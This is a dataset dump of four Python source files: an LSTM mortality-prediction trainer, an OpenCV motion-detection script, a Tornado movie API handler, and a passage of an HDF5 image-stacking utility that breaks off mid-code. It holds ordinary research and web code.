+{"seq_id":"39363849378","text":"import pandas as pd\nimport torch\nimport numpy as np\nimport pdb\nfrom pathlib import Path\nimport os\nfrom os.path import abspath\nfrom death.post.inputgen_planF import InputGenF\nfrom torch.utils.data import DataLoader\nimport torch.nn as nn\nfrom torch.nn.modules import LSTM\nfrom torch.autograd import Variable\nimport pickle\nfrom shutil import copy\nimport traceback\nfrom collections import deque\nimport datetime\nfrom death.DNC.tsDNCtrainer import logprint\nfrom death.taco.collate import pad_collate\n\nbatch_size = 1\n\n\ndef sv(var):\n    return var.data.cpu().numpy()\n\nclass dummy_context_mgr():\n    def __enter__(self):\n        return None\n\n    def __exit__(self, exc_type, exc_value, traceback):\n        return False\n\ndef save_model(net, optim, epoch, iteration, savestr):\n    epoch = int(epoch)\n    task_dir = os.path.dirname(abspath(__file__))\n    if not os.path.isdir(Path(task_dir) / \"saves\" / savestr):\n        os.mkdir(Path(task_dir) / \"saves\" / savestr)\n    pickle_file = Path(task_dir).joinpath(\"saves/\" + savestr + \"/lstmnorm_\" + str(epoch) + \"_\" + str(iteration) + \".pkl\")\n    with pickle_file.open('wb') as fhand:\n        torch.save((net, optim, epoch, iteration), fhand)\n    print('model saved at', pickle_file)\n\ndef load_model(computer, optim, starting_epoch, starting_iteration, savestr):\n    task_dir = os.path.dirname(abspath(__file__))\n    save_dir = Path(task_dir) / \"saves\" / savestr\n    highestepoch = 0\n    highestiter = 0\n    for child in save_dir.iterdir():\n        try:\n            epoch = str(child).split(\"_\")[3]\n            iteration = str(child).split(\"_\")[4].split('.')[0]\n        except IndexError:\n            print(str(child))\n            continue\n        iteration = int(iteration)\n        epoch = int(epoch)\n        # some files are open but not written to yet.\n        if child.stat().st_size > 20480:\n            if epoch > highestepoch or (iteration > highestiter and epoch == highestepoch):\n                highestepoch = epoch\n                highestiter = iteration\n    if highestepoch == 0 and highestiter == 0:\n        print(\"nothing to load\")\n        return computer, optim, starting_epoch, starting_iteration\n    pickle_file = Path(task_dir).joinpath(\n        \"saves/\" + savestr + \"/lstmnorm_\" + str(highestepoch) + \"_\" + str(highestiter) + \".pkl\")\n    print(\"loading model at\", pickle_file)\n    with pickle_file.open('rb') as pickle_file:\n        computer, optim, epoch, iteration = torch.load(pickle_file)\n    print('Loaded model at epoch ', highestepoch, 'iteration', iteration)\n\n    return computer, optim, highestepoch, highestiter\n\ndef salvage():\n    # this function will pick up the last two highest epoch training and save them somewhere else,\n    # this is to prevent unexpected data loss.\n    # We are working in a /tmp folder, and we write around 1Gb per minute.\n    # The loss of data is likely.\n\n    task_dir = os.path.dirname(abspath(__file__))\n    save_dir = Path(task_dir) / \"lstmsaves\"\n    highestepoch = -1\n    secondhighestiter = -1\n    highestiter = -1\n    for child in save_dir.iterdir():\n        epoch = 
str(child).split(\"_\")[3]\n        iteration = str(child).split(\"_\")[4].split('.')[0]\n        iteration = int(iteration)\n        epoch = int(epoch)\n        # some files are open but not written to yet.\n        if epoch > highestepoch and iteration > highestiter and child.stat().st_size > 20480:\n            secondhighestiter = highestiter\n            highestepoch = epoch\n            highestiter = iteration\n    if highestepoch == -1 and highestiter == -1:\n        print(\"no file to salvage\")\n        return\n    if secondhighestiter != -1:\n        pickle_file2 = Path(task_dir).joinpath(\"lstmsaves/lstm_\" + str(highestepoch) + \"_\" + str(secondhighestiter) + \".pkl\")\n        copy(pickle_file2, \"/infodev1/rep/projects/jason/pickle/lstmsalvage2.pkl\")\n\n    pickle_file1 = Path(task_dir).joinpath(\"lstmsaves/lstm_\" + str(highestepoch) + \"_\" + str(highestiter) + \".pkl\")\n    copy(pickle_file1, \"/infodev1/rep/projects/jason/pickle/lstmsalvage1.pkl\")\n\n    print('salvaged, we can start again with /infodev1/rep/projects/jason/pickle/lstmsalvage1.pkl')\n\nglobal_exception_counter=0\ndef run_one_patient(computer, input, target, target_dim, optimizer, loss_type, real_criterion,\n                    binary_criterion, validate=False):\n    global global_exception_counter\n    patient_loss=None\n    try:\n        optimizer.zero_grad()\n        input = Variable(torch.Tensor(input).cuda())\n        target = Variable(torch.Tensor(target).cuda())\n\n        # we have no critical index, because critical index are those timesteps that\n        # DNC is required to produce outputs. This is not the case for our project.\n        # criterion does not need to be reinitiated for every story, because we are not using a mask\n\n        patient_output=computer(input)\n        cause_of_death_output = patient_output[:, :, 1:]\n        cause_of_death_target = target[:, :, 1:]\n        patient_loss= binary_criterion(cause_of_death_output, cause_of_death_target)\n\n        if not validate:\n            patient_loss.backward()\n            optimizer.step()\n\n        if global_exception_counter>-1:\n            global_exception_counter-=1\n    except ValueError:\n        traceback.print_exc()\n        print(\"Value Error reached\")\n        print(datetime.datetime.now().time())\n        global_exception_counter+=1\n        if global_exception_counter==10:\n            save_model(computer, optimizer, epoch=0, iteration=global_exception_counter, savestr=\"error\")  # savestr is required; \"error\" is an assumed subfolder name for emergency saves\n            raise ValueError(\"Global exception counter reached 10. Likely the model has nan in weights\")\n        else:\n            pass\n\n    return patient_loss\n\n\ndef train(computer, optimizer, real_criterion, binary_criterion,\n          train, valid_dl, starting_epoch, total_epochs, starting_iter, iter_per_epoch, savestr, logfile=False):\n    valid_iterator=iter(valid_dl)\n    print_interval=10\n    val_interval=200\n    save_interval=800\n    target_dim=None\n    rldmax_len=50\n    val_batch=100\n    running_loss_deque=deque(maxlen=rldmax_len)\n    if logfile:\n        open(logfile, 'w').close()\n\n    for epoch in range(starting_epoch, total_epochs):\n        for i, (input, target, loss_type) in enumerate(train):\n            i=starting_iter+i\n            if target_dim is None:\n                target_dim=target.shape[2]\n\n            if i < iter_per_epoch:\n                train_story_loss = run_one_patient(computer, input, target, target_dim, optimizer, loss_type,\n                                                   real_criterion, binary_criterion)\n                if train_story_loss is not None:\n                    printloss=float(train_story_loss[0])\n                else:\n                    raise ValueError(\"Why would story loss be None?\")\n                running_loss_deque.appendleft(printloss)\n                if i % print_interval == 0:\n                    running_loss=np.mean(running_loss_deque)\n                    logprint(logfile, \"learning. count: %4d, training loss: %.10f, running loss: %.10f\" %\n                             (i, printloss, running_loss))\n\n\n                if i % val_interval == 0:\n                    printloss=0\n                    for _ in range(val_batch):\n                        # we should consider running validation multiple times and average. 
TODO\n                        try:\n                            (input,target,loss_type)=next(valid_iterator)\n                        except StopIteration:\n                            valid_iterator=iter(valid_dl)\n                            (input,target,loss_type)=next(valid_iterator)\n\n                        val_loss = run_one_patient(computer, input, target, target_dim, optimizer, loss_type,\n                                                   real_criterion, binary_criterion, validate=True)\n                        if val_loss is not None:\n                            printloss += float(val_loss[0])\n                        else:\n                            raise ValueError (\"Investigate this\")\n                    printloss=printloss/val_batch\n                    logprint(logfile, \"validation. count: %4d, val loss : %.10f\" %\n                             (i, printloss))\n\n                if i % save_interval == 0:\n                    save_model(computer, optimizer, epoch, i, savestr)\n                    print(\"model saved for epoch\", epoch, \"input\", i)\n            else:\n                break\n\ndef valid(computer, optimizer, real_criterion, binary_criterion,\n          train, valid_dl, starting_epoch, total_epochs, starting_iter, iter_per_epoch, logfile=False):\n    running_loss=[]\n    target_dim=None\n    valid_iterator=iter(valid_dl)\n\n    for i, (input, target, loss_type) in enumerate(valid_iterator):\n        val_loss = run_one_patient(computer, input, target, target_dim, optimizer, loss_type,\n                                   real_criterion, binary_criterion, validate=True)\n        if val_loss is not None:\n            printloss = float(val_loss[0])\n            running_loss.append(printloss)\n            if logfile:\n                with open(logfile, 'a') as handle:\n                    handle.write(\"validation. count: %4d, val loss : %.10f \\n\" %\n                                 (i, printloss))\n            print(\"validation. count: %4d, val loss: %.10f\" %\n                  (i, printloss))\n    print(np.mean(running_loss))\n\n\nclass lstmwrapper(nn.Module):\n    def __init__(self,input_size=66529, output_size=5952,hidden_size=52,num_layers=16,batch_first=True,\n                 dropout=0.1):\n        super(lstmwrapper, self).__init__()\n        self.lstm=LSTM(input_size=input_size,hidden_size=hidden_size,num_layers=num_layers,\n                       batch_first=batch_first,dropout=dropout)\n        self.output=nn.Linear(hidden_size,output_size)\n        self.bn = nn.BatchNorm1d(input_size)\n        self.reset_parameters()\n\n    def reset_parameters(self):\n        self.lstm.reset_parameters()\n        self.output.reset_parameters()\n\n    def forward(self, input, hx=None):\n        input=self.bn(input)\n        output,statetuple=self.lstm(input,hx)\n        return self.output(output)\n\nclass lstmwrapper2(nn.Module):\n    def __init__(self,input_size=66529, output_size=5952,hidden_size=52,num_layers=16,batch_first=True,\n                 dropout=0.1):\n        super(lstmwrapper2, self).__init__()\n        self.lstm=LSTM(input_size=input_size,hidden_size=hidden_size,num_layers=num_layers,\n                       batch_first=batch_first,dropout=dropout)\n        self.output=nn.Linear(hidden_size,output_size)\n        self.reset_parameters()\n\n    def reset_parameters(self):\n        self.lstm.reset_parameters()\n        self.output.reset_parameters()\n\n    def forward(self, input, hx=None):\n        output,statetuple=self.lstm(input,hx)\n        return self.output(output)\n\ndef validationonly():\n    '''\n    :return:\n    '''\n\n    lr = 1e-2\n    optim = None\n    logfile = \"vallog.txt\"\n\n    num_workers = 8\n    ig = InputGenF()\n    # multiprocessing disabled, because socket request seems unstable.\n    # performance should not be too bad?\n    trainds = ig.get_train()\n    validds = ig.get_valid()\n    validdl = DataLoader(dataset=validds,num_workers=num_workers, batch_size=1)\n    print(\"Using\", num_workers, \"workers for validation set\")\n    # testing whether this LSTM works is basically a question whether\n    lstm = lstmwrapper()\n\n    # load model:\n    print(\"loading model\")\n    lstm, optim, starting_epoch, starting_iteration = load_model(lstm, optim, 0, 0, \"default\")  # savestr \"default\" is an assumed save subfolder\n\n    lstm = lstm.cuda()\n    if optim is None:\n        optimizer = torch.optim.Adam(lstm.parameters(), lr=lr)\n    else:\n        # print('use Adadelta optimizer with learning rate 
', lr)\n        # optimizer = torch.optim.Adadelta(computer.parameters(), lr=lr)\n        optimizer = optim\n\n    real_criterion = nn.SmoothL1Loss()\n    binary_criterion = nn.BCEWithLogitsLoss()\n\n    traindl=None\n    total_epochs=None\n    iter_per_epoch=None\n\n    # starting with the epoch after the loaded one\n    valid(lstm, optimizer, real_criterion, binary_criterion,\n          traindl, validdl, int(starting_epoch), total_epochs,int(starting_iteration), iter_per_epoch, logfile)\n\ndef main(load=False, savestr=\"default\"):  # defaults assumed so the bare main() call below runs\n    total_epochs = 3\n    iter_per_epoch = 100000\n    lr = 1e-3\n    optim = None\n    starting_epoch = 0\n    starting_iteration= 0\n    logstring = str(datetime.datetime.now().time())\n    logstring = logstring.replace(\" \", \"_\")\n    logfile = \"log/\"+savestr+\"_\"+logstring+\".txt\"\n\n    num_workers = 8\n    ig = InputGenF(death_fold=0)\n    trainds = ig.get_train()\n    validds = ig.get_valid()\n    validdl = DataLoader(dataset=validds, batch_size=8, num_workers=num_workers, collate_fn=pad_collate)\n    traindl = DataLoader(dataset=trainds, batch_size=8, num_workers=num_workers//4, collate_fn=pad_collate)\n\n    print(\"Using\", num_workers, \"workers for training set\")\n    # testing whether this LSTM works is basically a question whether\n    lstm=lstmwrapper()\n\n    # load model:\n    if load:\n        print(\"loading model\")\n        lstm, optim, starting_epoch, starting_iteration = load_model(lstm, optim, starting_epoch, starting_iteration, savestr)\n\n    lstm = lstm.cuda()\n    if optim is None:\n        optimizer = torch.optim.Adam(lstm.parameters(), lr=lr)\n    else:\n        # print('use Adadelta optimizer with learning rate ', lr)\n        # optimizer = torch.optim.Adadelta(computer.parameters(), lr=lr)\n        optimizer = optim\n\n    real_criterion = nn.SmoothL1Loss()\n    binary_criterion = nn.BCEWithLogitsLoss()\n\n    # starting with the epoch after the loaded one\n\n    train(lstm, optimizer, real_criterion, binary_criterion,\n          traindl, validdl, int(starting_epoch), total_epochs,\n          int(starting_iteration), iter_per_epoch, savestr, logfile)\n\n\nif __name__ == \"__main__\":\n    # main(load=True\n    main()\n\n    '''\n    lr=1e-4 is extremely slow.\n    This is probably because I averaged the loss across the whole sequence? 
Why is this not a problem for Tacotron?\n '''","repo_name":"phimachine/mayoehr","sub_path":"death/trashcan/lstmtrainer.py","file_name":"lstmtrainer.py","file_ext":"py","file_size_in_byte":13831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"69962784091","text":"import cv2\nimport numpy as np\nimport time\nfrom matplotlib import pyplot as plt\n\ncap = cv2.VideoCapture(1)\ntime.sleep(0.25)\n_, img = cap.read()\n\nbgref =img.copy()\nbgref =cv2.cvtColor(bgref,cv2.COLOR_BGR2GRAY)\nbgref = cv2.GaussianBlur(bgref, (21, 21), 0)\n\ncv2.imshow(\"Background\",bgref)\nwhile(1):\n\n # Take each frame\n _, img = cap.read()\n \n gray=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n gray = cv2.GaussianBlur(gray, (21, 21), 0)\n \n frameDelta = cv2.absdiff(bgref, gray)\n thresh = cv2.threshold(frameDelta, 10, 255, cv2.THRESH_BINARY)[1]\n \n # dilate the thresholded image to fill in holes, then find contours\n # on thresholded image\n thresh = cv2.dilate(thresh, None, iterations=1)\n cv2.imshow(\"thresh\",thresh)\n cnts= cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)[1]\n \n # loop over the contours\n for c in cnts:\n # if the contour is too small, ignore it\n (x, y, w, h) = cv2.boundingRect(c)\n if w<100 or h<100:\n continue\n \n # compute the bounding box for the contour, draw it on the frame,\n # and update the text\n cv2.rectangle(img, (x, y), (x + w, y + h), (0, 255, 0), 2)\n \n cv2.imshow(\"obj\",img)\n \n k = cv2.waitKey(25) & 0xFF\n if k == 27:\n break\n \ncap.release()\ncv2.destroyAllWindows()","repo_name":"arjunprakash05/OpenCV_Realtime_Project","sub_path":"temp12.py","file_name":"temp12.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19595028705","text":"# -*- coding: utf-8 -*-\n'''\nCreated on Mar 11, 2013\n\n@author: Fang Jiaguo\n'''\nfrom handlers.base_handler import BaseHandler, user_profile\nfrom settings import mongodb\nfrom utilities import JSONEncoderExt\nimport json\nimport tornado.gen\nimport tornado.web\n\nclass MovieCategoryAPIHandler(BaseHandler):\n @user_profile\n @tornado.web.asynchronous\n @tornado.gen.engine\n def get(self):\n \"\"\"Movie category API.\n\n :query string sort: Sort result by which field (optional).\n :query string start: Start index of the movie list (optional, TOTAL_ACCESSABLE_MOVIES > $start >= 0).\n :query string limit: Limited number of movies in a single request (optional, MOVIES_PER_REQUEST >= $limit > 0).\n\n This API doesn't need to be authorized.\n \"\"\"\n # query string: sort\n sort_field = self.get_argument('sort', None)\n if sort_field not in self.SORT_FIELDS:\n sort_field = None\n if sort_field:\n sort = [(sort_field, -1)]\n else:\n sort = None\n\n # query string: start\n start = self.get_argument('start', 0)\n try:\n start = int(start)\n except:\n start = 0\n if start < 0:\n start = 0\n\n # query string: limit\n limit = self.get_argument('limit', self.MOVIES_PER_REQUEST)\n try:\n limit = int(limit)\n except:\n limit = self.MOVIES_PER_REQUEST\n if limit <= 0 or limit > self.MOVIES_PER_REQUEST:\n limit = self.MOVIES_PER_REQUEST\n\n # User can only access a fixed amount of movies.\n if start < self.TOTAL_ACCESSABLE_MOVIES:\n try:\n result, error = yield tornado.gen.Task(mongodb['movies'].find,\n fields={'summary': 0},\n skip=start,\n limit=min(limit, self.TOTAL_ACCESSABLE_MOVIES - start), # important!\n sort=sort)\n movies = result[0]\n except:\n raise 
tornado.web.HTTPError(500)\n if error.get('error'):\n raise tornado.web.HTTPError(500)\n else:\n movies = []\n\n response = {\n 'movies': movies,\n 'total': len(movies),\n 'start': start,\n 'limit': limit\n }\n self.write(json.dumps(response, cls=JSONEncoderExt))\n self.finish()\n","repo_name":"jiaguofang/right-channel","sub_path":"projects/right-channel-web/apis/movie_category_api_handler.py","file_name":"movie_category_api_handler.py","file_ext":"py","file_size_in_byte":2545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18883125585","text":"import os\nimport time\n\nimport h5py\nimport pprint\nimport numpy as np\nfrom operator import itemgetter\n\nfrom joblib import Parallel, delayed\n\nfrom tinydb import TinyDB, Query\nfrom tinydb.storages import JSONStorage\nfrom tinydb.middlewares import CachingMiddleware\nfrom tinydb.storages import MemoryStorage\n\nfrom txm2nexuslib.parser import get_file_paths\nfrom txm2nexuslib.images.util import filter_file_index, dict2hdf5\n\n\ndef create_structure_dict(type_struct=\"normalized\"):\n # Construct a dictionary with the metadata structure representing\n # the future hdf5 structure\n if type_struct == \"normalized\":\n hdf5_metadata_structure_dict = {\"TomoNormalized\": {\n \"AverageFF\": [],\n \"Avg_FF_ExpTime\": [],\n \"CurrentsFF\": [],\n \"CurrentsTomo\": [],\n \"ExpTimesTomo\": [],\n \"energy\": [],\n \"rotation_angle\": [],\n \"x_pixel_size\": [],\n \"y_pixel_size\": []}\n }\n elif (type_struct == \"normalized_multifocus\" or\n type_struct == \"normalized_simple\"):\n hdf5_metadata_structure_dict = {\"TomoNormalized\": {\n \"energy\": [],\n \"rotation_angle\": [],\n \"x_pixel_size\": [],\n \"y_pixel_size\": []}\n }\n elif type_struct == \"normalized_spectroscopy\":\n hdf5_metadata_structure_dict = {\"SpecNormalized\": {\n \"energy\": [],\n \"rotation_angle\": [],\n \"x_pixel_size\": [],\n \"y_pixel_size\": []}\n }\n elif type_struct == \"normalized_magnetism_many_repetitions\":\n hdf5_metadata_structure_dict = {\"TomoNormalized\": {\n \"energy\": [],\n \"rotation_angle\": [],\n \"x_pixel_size\": [],\n \"y_pixel_size\": [],\n \"jj_offset\": []}\n }\n elif type_struct == \"aligned\" or type_struct == \"aligned_multifocus\":\n hdf5_metadata_structure_dict = {\"FastAligned\": {\n \"energy\": [],\n \"rotation_angle\": [],\n \"x_pixel_size\": [],\n \"y_pixel_size\": []}\n }\n else:\n pass\n return hdf5_metadata_structure_dict\n\ndef metadata_2_stack_dict(hdf5_structure_dict,\n files_for_stack, ff_filenames=None,\n type_struct=\"normalized\",\n avg_ff_dataset=\"data\"):\n \"\"\" Transfer data from many hdf5 individual image files\n into a single hdf5 stack file.\n This method is quite specific for normalized BL09 images\"\"\"\n\n data_filenames = files_for_stack[\"data\"]\n\n num_keys = len(hdf5_structure_dict)\n if num_keys == 1:\n k, hdf5_structure_dict = hdf5_structure_dict.items()[0]\n\n def extract_metadata_original(metadata_original, hdf5_structure_dict):\n for dataset_name in hdf5_structure_dict:\n if dataset_name in metadata_original:\n value = metadata_original[dataset_name].value\n if (dataset_name == \"energy\" and\n type_struct != \"normalized_spectroscopy\"):\n value = round(value, 1)\n elif (dataset_name == \"energy\" and\n type_struct == \"normalized_spectroscopy\"):\n value = round(value, 2)\n hdf5_structure_dict[dataset_name].append(value)\n\n if type_struct == \"normalized_magnetism_many_repetitions\":\n jj_offset = files_for_stack[\"jj_offset\"]\n 
hdf5_structure_dict[\"jj_offset\"] = [jj_offset]\n\n c = 0\n for file in data_filenames:\n # print(file)\n f = h5py.File(file, \"r\")\n # Process metadata\n metadata_original = f[\"metadata\"]\n extract_metadata_original(metadata_original, hdf5_structure_dict)\n if (type_struct == \"normalized\" or\n type_struct == \"normalized_simple\" or\n type_struct == \"normalized_multifocus\" or\n type_struct == \"normalized_magnetism_many_repetitions\" or\n type_struct == \"normalized_spectroscopy\" or\n type_struct == \"aligned\" or\n type_struct == \"aligned_multifocus\"):\n if c == 0:\n hdf5_structure_dict[\"x_pixel_size\"].append(\n round(metadata_original[\"pixel_size\"].value, 6))\n hdf5_structure_dict[\"y_pixel_size\"].append(\n round(metadata_original[\"pixel_size\"].value, 6))\n if (\"energy\" not in hdf5_structure_dict and\n type_struct != \"normalized_spectroscopy\"):\n hdf5_structure_dict[\"energy\"].append(\n round(metadata_original[\"energy\"].value, 1))\n elif (\"energy\" not in hdf5_structure_dict and\n type_struct == \"normalized_spectroscopy\"):\n hdf5_structure_dict[\"energy\"].append(\n round(metadata_original[\"energy\"].value, 2))\n hdf5_structure_dict[\"rotation_angle\"].append(\n round(metadata_original[\"angle\"].value, 1))\n if type_struct == \"normalized\":\n hdf5_structure_dict[\"ExpTimesTomo\"].append(\n round(metadata_original[\"exposure_time\"].value, 2))\n hdf5_structure_dict[\"CurrentsTomo\"].append(\n round(metadata_original[\"machine_current\"].value, 6))\n f.close()\n c += 1\n\n c = 0\n if ff_filenames and type_struct == \"normalized\":\n for ff_file in ff_filenames:\n f = h5py.File(ff_file, \"r\")\n metadata_original = f[\"metadata\"]\n # Process metadata\n if c == 0:\n hdf5_structure_dict[\"Avg_FF_ExpTime\"].append(\n metadata_original[\"exposure_time\"].value)\n hdf5_structure_dict[\"AverageFF\"] = f[avg_ff_dataset].value\n hdf5_structure_dict[\"CurrentsFF\"].append(\n metadata_original[\"machine_current\"].value)\n f.close()\n c += 1\n if num_keys == 1:\n hdf5_structure_dict = {k: hdf5_structure_dict}\n return hdf5_structure_dict\n\n\ndef data_2_hdf5(h5_stack_file_handler,\n data_filenames, ff_filenames=None,\n type_struct=\"normalized\",\n dataset=\"data\"):\n \"\"\"Generic method to create an hdf5 stack of images from individual\n images\"\"\"\n\n if (type_struct == \"normalized\" or\n type_struct == \"normalized_simple\" or\n type_struct == \"normalized_multifocus\" or\n type_struct == \"normalized_magnetism_many_repetitions\"):\n main_grp = \"TomoNormalized\"\n main_dataset = \"TomoNormalized\"\n if ff_filenames and type_struct == \"normalized\":\n ff_dataset = \"FFNormalizedWithCurrent\"\n elif type_struct == \"normalized_spectroscopy\":\n main_grp = \"SpecNormalized\"\n main_dataset = \"spectroscopy_normalized\"\n elif type_struct == \"aligned\" or type_struct == \"aligned_multifocus\":\n main_grp = \"FastAligned\"\n main_dataset = \"tomo_aligned\"\n else:\n pass\n\n num_img = 0\n for file in data_filenames:\n # Images normalized\n f = h5py.File(file, \"r\")\n if num_img == 0:\n n_frames = len(data_filenames)\n num_rows, num_columns = np.shape(f[dataset].value)\n h5_stack_file_handler[main_grp].create_dataset(\n main_dataset,\n shape=(n_frames, num_rows, num_columns),\n chunks=(1, num_rows, num_columns),\n dtype='float32')\n h5_stack_file_handler[main_grp][main_dataset].attrs[\n 'Number of Frames'] = n_frames\n h5_stack_file_handler[main_grp][main_dataset][\n num_img] = f[dataset].value\n f.close()\n num_img += 1\n\n if ff_filenames and type_struct == 
\"normalized\":\n # FF images normalized by machine_current and exp time\n num_img_ff = 0\n for ff_file in ff_filenames:\n f = h5py.File(ff_file, \"r\")\n if num_img_ff == 0:\n n_ff_frames = len(ff_filenames)\n num_rows, num_columns = np.shape(f[dataset].value)\n h5_stack_file_handler[main_grp].create_dataset(\n ff_dataset,\n shape=(n_ff_frames, num_rows, num_columns),\n chunks=(1, num_rows, num_columns),\n dtype='float32')\n h5_stack_file_handler[main_grp][ff_dataset].attrs[\n 'Number of Frames'] = n_ff_frames\n h5_stack_file_handler[main_grp][ff_dataset][\n num_img_ff] = f[dataset].value\n f.close()\n num_img_ff += 1\n\n\ndef make_stack(files_for_stack, root_path, type_struct=\"normalized\",\n suffix=\"_stack\"):\n\n data_files = files_for_stack[\"data\"]\n if \"ff\" in files_for_stack:\n data_files_ff = files_for_stack[\"ff\"]\n else:\n data_files_ff = None\n date = files_for_stack[\"date\"]\n sample = files_for_stack[\"sample\"]\n if type_struct != \"normalized_spectroscopy\":\n energy = files_for_stack[\"energy\"]\n if \"zpz\" in files_for_stack:\n zpz = files_for_stack[\"zpz\"]\n elif type_struct == \"normalized_magnetism_many_repetitions\":\n jj_offset = files_for_stack[\"jj_offset\"]\n\n # Creation of dictionary\n h5_struct_dict = create_structure_dict(type_struct=type_struct)\n data_dict = metadata_2_stack_dict(h5_struct_dict,\n files_for_stack,\n ff_filenames=data_files_ff,\n type_struct=type_struct)\n\n # Creation of hdf5 stack\n if type_struct == \"normalized\":\n h5_out_fn = (str(date) + \"_\" + str(sample) + \"_\" +\n str(energy) + \"_\" + str(zpz) + suffix + \".hdf5\")\n elif (type_struct == \"normalized_multifocus\" or\n type_struct == \"normalized_simple\"):\n h5_out_fn = (str(date) + \"_\" + str(sample) + \"_\" +\n str(energy) + suffix + \".hdf5\")\n elif type_struct == \"normalized_spectroscopy\":\n h5_out_fn = (str(date) + \"_\" + str(sample) +\n suffix + \".hdf5\")\n elif type_struct == \"normalized_magnetism_many_repetitions\":\n h5_out_fn = (str(date) + \"_\" + str(sample) + \"_\" +\n str(energy) + \"_\" + str(jj_offset) + suffix + \".hdf5\")\n if type_struct == \"aligned\":\n h5_out_fn = (str(date) + \"_\" + str(sample) + \"_\" +\n str(energy) + \"_\" + str(zpz) + suffix + \"_ali.hdf5\")\n if type_struct == \"aligned_multifocus\":\n h5_out_fn = (str(date) + \"_\" + str(sample) + \"_\" +\n str(energy) + suffix + \"_ali.hdf5\")\n h5_out_fn = root_path + \"/\" + h5_out_fn\n h5_stack_file_handler = h5py.File(h5_out_fn, \"w\")\n dict2hdf5(h5_stack_file_handler, data_dict)\n data_2_hdf5(h5_stack_file_handler,\n data_files, ff_filenames=data_files_ff,\n type_struct=type_struct)\n\n h5_stack_file_handler.flush()\n h5_stack_file_handler.close()\n # Record does not contain energy and zpz because in some cases\n # the same stack could contain many different energies or\n # many different zpz\n record = {\"filename\": os.path.basename(h5_out_fn),\n \"extension\": \".hdf5\",\n \"date\": date, \"sample\": sample, \"stack\": True}\n record.update({\"type\": type_struct})\n return record\n\n\ndef many_images_to_h5_stack(file_index_fn, table_name=\"hdf5_proc\",\n type_struct=\"normalized\", suffix=\"_stack\",\n date=None, sample=None, energy=None, zpz=None,\n ff=None, subfolders=False, cores=-2):\n \"\"\"Go from many images hdf5 files to a single stack of images\n hdf5 file.\n Using all cores but one, for the computations\"\"\"\n\n # TODO: spectroscopy normalized not implemented (no Avg FF, etc)\n print(\"--- Individual images to stacks ---\")\n start_time = time.time()\n 
file_index_db = TinyDB(file_index_fn,\n storage=CachingMiddleware(JSONStorage))\n db = file_index_db\n if table_name is not None:\n file_index_db = file_index_db.table(table_name)\n\n files_query = Query()\n if (date is not None or sample is not None or energy is not None or\n zpz is not None or ff is not None):\n file_index_db = filter_file_index(file_index_db, files_query,\n date=date, sample=sample,\n energy=energy,\n zpz=zpz, ff=ff)\n\n root_path = os.path.dirname(os.path.abspath(file_index_fn))\n all_file_records = file_index_db.all()\n stack_table = db.table(\"hdf5_stacks\")\n stack_table.purge()\n files_list = []\n\n if type_struct == \"normalized\" or type_struct == \"aligned\":\n dates_samples_energies_zpzs = []\n for record in all_file_records:\n dates_samples_energies_zpzs.append((record[\"date\"],\n record[\"sample\"],\n record[\"energy\"],\n record[\"zpz\"]))\n dates_samples_energies_zpzs = list(set(dates_samples_energies_zpzs))\n for date_sample_energy_zpz in dates_samples_energies_zpzs:\n date = date_sample_energy_zpz[0]\n sample = date_sample_energy_zpz[1]\n energy = date_sample_energy_zpz[2]\n zpz = date_sample_energy_zpz[3]\n\n # Query building parts\n da = (files_query.date == date)\n sa = (files_query.sample == sample)\n en = (files_query.energy == energy)\n zp = (files_query.zpz == zpz)\n ff_false = (files_query.FF == False)\n ff_true = (files_query.FF == True)\n\n data_files_ff = []\n if file_index_db.search(files_query.FF.exists()):\n # Query command\n query_cmd_ff = (da & sa & en & ff_true)\n h5_ff_records = file_index_db.search(query_cmd_ff)\n data_files_ff = get_file_paths(h5_ff_records, root_path,\n use_subfolders=subfolders)\n if file_index_db.search(files_query.FF.exists()):\n # Query command\n query_cmd = (da & sa & en & zp & ff_false)\n else:\n # Query command\n query_cmd = (da & sa & en & zp)\n h5_records = file_index_db.search(query_cmd)\n h5_records = sorted(h5_records, key=itemgetter('angle'))\n\n data_files = get_file_paths(h5_records, root_path,\n use_subfolders=subfolders)\n files_dict = {\"data\": data_files, \"ff\": data_files_ff,\n \"date\": date, \"sample\": sample, \"energy\": energy,\n \"zpz\": zpz}\n files_list.append(files_dict)\n elif (type_struct == \"normalized_multifocus\" or\n type_struct == \"normalized_simple\" or\n type_struct == \"aligned_multifocus\"):\n dates_samples_energies = []\n for record in all_file_records:\n dates_samples_energies.append((record[\"date\"],\n record[\"sample\"],\n record[\"energy\"]))\n dates_samples_energies = list(set(dates_samples_energies))\n for date_sample_energy in dates_samples_energies:\n date = date_sample_energy[0]\n sample = date_sample_energy[1]\n energy = date_sample_energy[2]\n\n # Query building parts\n da = (files_query.date == date)\n sa = (files_query.sample == sample)\n en = (files_query.energy == energy)\n\n # Query command\n query_cmd = (da & sa & en)\n h5_records = file_index_db.search(query_cmd)\n h5_records = sorted(h5_records, key=itemgetter('angle'))\n\n data_files = get_file_paths(h5_records, root_path,\n use_subfolders=subfolders)\n files_dict = {\"data\": data_files, \"date\": date, \"sample\": sample,\n \"energy\": energy}\n files_list.append(files_dict)\n\n elif type_struct == \"normalized_magnetism_many_repetitions\":\n dates_samples_energies_jjs = []\n for record in all_file_records:\n dates_samples_energies_jjs.append((record[\"date\"],\n record[\"sample\"],\n record[\"energy\"],\n record[\"jj_offset\"]))\n\n dates_samples_energies_jjs = 
